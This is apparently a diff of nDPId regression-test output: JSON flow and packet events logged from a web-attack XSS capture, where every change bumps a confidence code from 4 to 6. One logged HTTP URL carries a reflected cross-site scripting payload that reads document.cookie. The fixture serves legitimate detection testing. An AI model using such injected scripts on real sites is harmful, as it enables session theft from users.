-00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7563,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347872187,"flow_last_seen":1499347877028,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347877028,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7563,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347872187,"flow_last_seen":1499347877028,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347877028,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347877292,"flow_last_seen":1499347877292,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347877292,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1499347877292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347877292,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8t4hAAD4GDkisEAABwKgKMoNiAFCEB9ewAAAAAKACchAeJQAAAgQFtAQCCAoBPGA4AAAAAAEDAwc="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":2,"flow_last_seen":1499347877292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347877292,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg2I\/o2nZhAfXsaAScSA\/9QAAAgQFtAQCCAoD5jGsATxgOAEDAwc="} 
@@ -3266,7 +3266,7 @@ 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347810243,"flow_last_seen":1499347815843,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32932,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347811525,"flow_last_seen":1499347816843,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347811525,"flow_last_seen":1499347816843,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347743331,"flow_last_seen":1499347811268,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347743331,"flow_last_seen":1499347811268,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347939286,"flow_last_seen":1499347939286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347939286,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1499347939286,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347939286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86O9AAD4G3OCsEAABwKgKMoXmAFBSpnQtAAAAAKACchBz+wAAAgQFtAQCCAoBPJzCAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":2,"flow_last_seen":1499347939286,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347939286,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQheYnhiyyUqZ0LqAScSCuhQAAAgQFtAQCCAoD5m42ATycwgEDAwc="} 
@@ -3275,7 +3275,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1499347940593,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347940593,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87cVAAD4G2AqsEAABwKgKMoX0AFCR9XPMAAAAAKACchAzuAAAAgQFtAQCCAoBPJ4JAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":2,"flow_last_seen":1499347940593,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347940593,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhfTE5Ae8kfVzzaAScSD0kgAAAgQFtAQCCAoD5m99ATyeCQEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8076,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":3,"flow_last_seen":1499347940594,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347940594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07cZAAD4G2BGsEAABwKgKMoX0AFCR9XPNxOQHvYAQAOWTmgAAAQEICgE8ngkD5m99"} 
-01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347939286,"flow_last_seen":1499347941874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347941874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27TNRH0PFRPCFVXECFZU2OUYBTDZQVIWB8HBZ1VC7EXA9PGMGBWA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347939286,"flow_last_seen":1499347941874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347941874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27TNRH0PFRPCFVXECFZU2OUYBTDZQVIWB8HBZ1VC7EXA9PGMGBWA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347943146,"flow_last_seen":1499347943146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347943146,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1499347943146,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347943146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TwNAAD4Gds2sEAABwKgKMoYOAFBjnu+EAAAAAKACchDjvgAAAgQFtAQCCAoBPKCHAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":2,"flow_last_seen":1499347943146,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347943146,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhg4T7s6FY57vhaAScSCMRwAAAgQFtAQCCAoD5nH8ATyghwEDAwc="} 
@@ -3472,7 +3472,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8551,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1499347998605,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347998605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MQxAAD4GlMSsEAABwKgKMohUAFBMT+e8AAAAAKACchDKZgAAAgQFtAQCCAoBPNawAAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8552,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":2,"flow_last_seen":1499347998605,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347998605,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiFT+qOY2TE\/nvaAScSA6WwAAAgQFtAQCCAoD5qgkATzWsAEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":3,"flow_last_seen":1499347998606,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347998606,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MQ1AAD4GlMusEAABwKgKMohUAFBMT+e9\/qjmN4AQAOXZYQAAAQEICgE81rED5qgk"} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347807664,"flow_last_seen":1499347876003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232685,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347807664,"flow_last_seen":1499347876003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232685,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347864367,"flow_last_seen":1499347869864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347864367,"flow_last_seen":1499347869864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347867086,"flow_last_seen":1499347872866,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -3499,7 +3499,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1499348006334,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348006334,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NJlAAD4GkTesEAABwKgKMoikAFAqsOqkAAAAAKACchDhQAAAAgQFtAQCCAoBPN49AAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8612,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":2,"flow_last_seen":1499348006334,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348006334,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiKQqwf7AKrDqpaAScSAFBgAAAgQFtAQCCAoD5q+xATzePQEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":3,"flow_last_seen":1499348006335,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348006335,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NJpAAD4GkT6sEAABwKgKMoikAFAqsOqlKsH+wYAQAOWkDQAAAQEICgE83j0D5q+x"} 
-00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8623,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348002450,"flow_last_seen":1499348007347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499348007347,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8623,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348002450,"flow_last_seen":1499348007347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499348007347,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348007599,"flow_last_seen":1499348007599,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348007599,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1499348007599,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348007599,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+WFAAD4GzG6sEAABwKgKMoiyAFBEayYYAAAAAKACchCKyAAAAgQFtAQCCAoBPN95AAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8628,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":2,"flow_last_seen":1499348007599,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348007599,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiLJr5HteRGsmGaAScSDvkAAAAgQFtAQCCAoD5rDtATzfeQEDAwc="} 
@@ -3716,7 +3716,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1499348070791,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348070791,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jQtAAD4GOMWsEAABwKgKMotGAFAklpAkAAAAAKACchAARwAAAgQFtAQCCAoBPR0vAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":2,"flow_last_seen":1499348070791,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348070791,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi0aOH7cfJJaQJaAScSDJXAAAAgQFtAQCCAoD5u6jAT0dLwEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":3,"flow_last_seen":1499348070792,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348070792,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jQxAAD4GOMysEAABwKgKMotGAFAklpAljh+3IIAQAOVoZAAAAQEICgE9HS8D5u6j"} 
